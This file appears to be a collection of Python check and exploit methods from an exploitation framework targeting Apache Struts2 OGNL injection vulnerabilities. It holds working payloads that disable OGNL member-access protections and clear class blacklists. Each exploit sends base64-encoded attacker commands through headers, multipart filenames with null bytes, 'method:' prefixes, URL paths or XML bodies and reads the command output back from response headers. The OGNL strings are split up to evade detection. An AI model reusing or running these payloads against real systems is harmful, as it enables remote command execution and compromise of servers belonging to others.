def exploit(self,cmd): req=http.Http(self.options) xx=req.post({'Content-Type':self.payload(cmd),'x-ids':base64.b64encode(cmd)},random.choice('abcdefwx')+'1=123456') if xx!=None and xx.status_code==200: try: x=base64.b64decode(xx.headers['x-ids']) return '[*] %s' % (x) except: return xx.text return '[!] execute cmd error.'
def exploit(self, cmd): req = http.Http(self.options) xx = req.post( { 'Content-Type': 'application/x-www-form-urlencoded', 'x-ids': base64.b64encode(cmd) }, 'pic=' + quote(self.payload(cmd))) if xx != None and xx.status_code == 200: try: x = base64.b64decode(xx.headers['x-ids']) return '[*] %s' % (x) except: return xx.text return '[!] execute cmd error.'
def check(self): req = http.Http(self.options) a = '''\ (#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.disp'+'atcher.Htt'+'pSe'+'rvletRe'+'sponse'].addHeader('x-ids','x123#')).\ (#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.disp'+'atcher.Htt'+'pSe'+'rvletRe'+'sponse'].getWriter().close())\ ''' xx = req.post({'Content-Type': 'application/x-www-form-urlencoded'}, 'pic=' + quote('%{' + a + '}')) try: if xx != None and xx.status_code == 200 and xx.headers[ 'x-ids'] == 'x123#': return True return False except: return False
def exploit(self, cmd): req = http.Http(self.options) aa = "----------6105\x0d\x0aContent-Disposition:form-data;name=\"x\";filename=\"%s\x00x\"\x0d\x0a\x0d\x0a\x0d\x0a----------6105--\x0d\x0a" xx = req.post( { 'Content-Type': 'multipart/form-data;boundary=--------6105', 'x-ids': base64.b64encode(cmd) }, aa % (self.payload(cmd))) if xx != None and xx.status_code == 200: try: x = base64.b64decode(xx.headers['x-ids']) return '[*] %s' % (x) except: return xx.text return '[!] execute cmd error.'
def check(self): req=http.Http(self.options) a='''\ ("multipart/form-data").\ (#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#x):(\ (#xx=#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.Act'+'ionCont'+'ext.co'+'nta'+'iner'].getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\ (#xx.getExcludedPackageNames().clear()).(#xx.getExcludedClasses().clear()).(#context.setMemberAccess(#x)))).\ (#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.disp'+'atcher.Htt'+'pSe'+'rvletRe'+'sponse'].addHeader('x-ids','x123#'))\ ''' xx=req.post({'Content-Type':'%{'+a+'}'},random.choice('abcdefwx')+'1=123456') try: if xx!=None and xx.status_code==200 and xx.headers['x-ids']=='x123#': return True return False except: return False
def exploit(self, cmd): req = http.Http(self.options) p, c = self.payload(cmd) a = base64.b64encode( 'com.opensymphony.xwork2.dispatcher.HttpServletResponse') xx = req.post( { 'Content-Type': 'application/x-www-form-urlencoded', '1': a, '2': base64.b64encode(c), '3': base64.b64encode('utf-8') }, 'method:' + quote(p)) if xx != None and xx.status_code == 200: try: x = base64.b64decode(xx.headers['1']) return '[*] %s' % (x) except: return xx.text return '[!] execute cmd error.'
def check(self): req = http.Http(self.options) a = '''\ (#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#x):(\ (#xx=#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.Act'+'ionCont'+'ext.co'+'nta'+'iner'].getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\ (#xx.getExcludedPackageNames().clear()).(#xx.getExcludedClasses().clear()).(#context.setMemberAccess(#x)))).\ (#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.disp'+'atcher.Htt'+'pSe'+'rvletRe'+'sponse'].addHeader('x-ids','x123#'))\ ''' aa = "----------6105\x0d\x0aContent-Disposition:form-data;name=\"x\";filename=\"%s\x00x\"\x0d\x0a\x0d\x0a\x0d\x0a----------6105--\x0d\x0a" xx = req.post( {'Content-Type': 'multipart/form-data;boundary=--------6105'}, aa % ('%{' + a + '}')) try: if xx != None and xx.status_code == 200 and xx.headers[ 'x-ids'] == 'x123#': return True return False except: return False
def exploit(self, cmd): req = http.Http(self.options) p, c = self.payload(cmd) req.url = req.url + '/' + quote(p) xx = req.get({ '1': base64.b64encode( 'com.opensymphony.xwork2.dispatcher.HttpServletResponse'), '2': base64.b64encode(c), '3': base64.b64encode('utf-8') }) if xx != None and xx.status_code == 200: try: x = base64.b64decode(xx.headers['1']) return '[*] %s' % (x) except: return xx.text return '[!] execute cmd error.'
def check(self): req = http.Http(self.options) a = '''\ (#[email protected]@DEFAULT_MEMBER_ACCESS).\ (#x=#parameters.%s[0],#context[#x].addHeader(1,@java.lang.System@getProperty(#parameters.%s[0]))).\ (#x=#context[#x].getWriter()).(#x.println(1),#x.flush(),#x.close())?x:x\ ''' a1 = random.choice('abcdefwx') + '1' a2 = random.choice('abcdefwx') + '2' xx = req.post( {'Content-Type': 'application/x-www-form-urlencoded'}, 'method:' + quote(a % (a1, a2)) + '&' + a1 + '=com.opensymphony.xwork2.dispatcher.HttpServletResponse&' + a2 + '=os.name') try: if xx != None and xx.status_code == 200 and len( xx.headers['1']) > 0: self.options['OS']['Value'] = xx.headers['1'] return True return False except: return False
def exploit(self,cmd): req=http.Http(self.options) cmd=cgi.escape(cmd) req.post({'Content-Type':'application/xml'},self.payload(cmd)) return '[*] execute cmd finish.'
def check(self): req=http.Http(self.options) xx=req.post({'Content-Type':'application/xml'},self.payload('')) if xx!=None and xx.status_code==500 and xx.text.find('java.lang.String cannot be cast to java.security.Provider$Service')!=-1: return True return False